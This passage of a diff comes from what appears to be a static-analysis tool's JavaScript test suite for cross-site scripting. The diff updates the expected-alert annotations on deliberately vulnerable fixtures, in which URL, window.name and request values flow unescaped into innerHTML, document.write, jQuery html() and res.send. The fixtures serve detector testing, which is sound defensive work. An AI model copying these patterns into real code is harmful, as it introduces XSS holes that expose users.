-256,28 +240,28 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } @@ -285,7 +269,7 @@ function testCreateContextualFragment() { var tainted = window.name; var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,14 +277,14 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { throw location; } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { @@ -308,18 +292,18 @@ function basicExceptions() { throw location } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } @@ -329,10 +313,10 @@ function getTaintedUrl() { function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } @@ -340,27 +324,27 @@ function hash() { function getUrl() { return new URL(document.location); } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { var target = document.location.search - $.jGrowl(target); // NOT OK + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - (this is a DOM-node); + this.html(target); // OK - (this is a DOM-node); - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -370,8 +354,7 @@ function thisNodes() { function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); @@ -381,68 +364,68 @@ function test() { var target = document.location.search - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + document.write(payload); // $ Alert let match = window.location.hash.match(/hello (\w+)/); if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ var source = document.location.search; - new Element("div"); // OK - new Element("div", {text: source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } @@ -452,53 +435,53 @@ const ansiToHtml = new Convert(); function ansiToHTML() { var source = document.location.search; - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { var source = document.location.search; let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { var url = document.location.search.substr(1); - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); @@ -506,7 +489,7 @@ function Foo() { function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..16932da72c05 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK - -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert + +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a1302d196a7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -22,7 +22,7 @@ }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..957fe1ba0497 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { let tainted = document.location.search; - $("
    " + tainted + "
    "); // NOT OK - $(`
    ${tainted}
    `); // NOT OK - $("
    ".concat(tainted).concat("
    ")); // NOT OK - $(["
    ", tainted, "
    "].join()); // NOT OK + $("
    " + tainted + "
    "); // $ Alert + $(`
    ${tainted}
    `); // $ Alert + $("
    ".concat(tainted).concat("
    ")); // $ Alert + $(["
    ", tainted, "
    "].join()); // $ Alert - $("
    "); // NOT OK - $(`
    `); // NOT OK - $("
    ")); // NOT OK - $(["
    "].join()); // NOT OK + $("
    "); // $ Alert + $(`
    `); // $ Alert + $("
    ")); // $ Alert + $(["
    "].join()); // $ Alert function indirection1(attrs) { return '
    ' + content + '
    '; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
    '.concat(content)).concat('
    '); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..f8a3d5c09486 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); @@ -116,7 +116,7 @@ app.get('/user/:id', function (req, res) { try { unknown(req.params.id); } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); @@ -127,7 +127,7 @@ app.get('/user/:id', function (req, res) { try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); @@ -135,10 +135,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); @@ -146,25 +146,25 @@ app.get('/user/:id', function (req, res) { var foo = document.location.search; new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { @@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); @@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index c3b1cbc2da8a..ef82f644a049 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting @@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // NOT OK - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) @@ -62,17 +61,17 @@ app.get('/user/:id', function (req, res) { .use(format) .use(html) .process(req.body, function (err, file) { - res.send(file); // NOT OK + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ @@ -94,20 +93,20 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); @@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting @@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..5ab9f9d6f265 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -134,9 +134,9 @@ function escapeHtml4(s) { app.get('/user/:id', function (req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..448f12270783 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -2,7 +2,7 @@ var express = require('express'); express().get('/user/', function(req, res) { var evil = req.query.evil; - res.send(console.log("
    %s
    ", evil)); // OK (returns undefined) - res.send(util.format("
    %s
    ", evil)); // NOT OK - res.send(require("printf")("
    %s
    ", evil)); // NOT OK + res.send(console.log("
    %s
    ", evil)); // OK - returns undefined + res.send(util.format("
    %s
    ", evil)); // $ Alert + res.send(require("printf")("
    %s
    ", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..cd6ca0c9e3da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -3,13 +3,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..105080e5fba2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,7 +7,7 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = sendResponse.bind(null, req.url); @@ -16,7 +16,7 @@ app.get("/some/path", (req, res) => { app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = underscore.partial(sendResponse, req.url); @@ -25,7 +25,7 @@ app.get("/underscore", (req, res) => { app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = lodash.partial(sendResponse, req.url); @@ -34,7 +34,7 @@ app.get("/lodash", (req, res) => { app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = R.partial(sendResponse, [req.url]); @@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..392a1f7ec612 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -3,9 +3,9 @@ let app = express(); app.get("/some/path", (req, res) => { new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..35021ea39120 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -4,8 +4,8 @@ var app = express(); 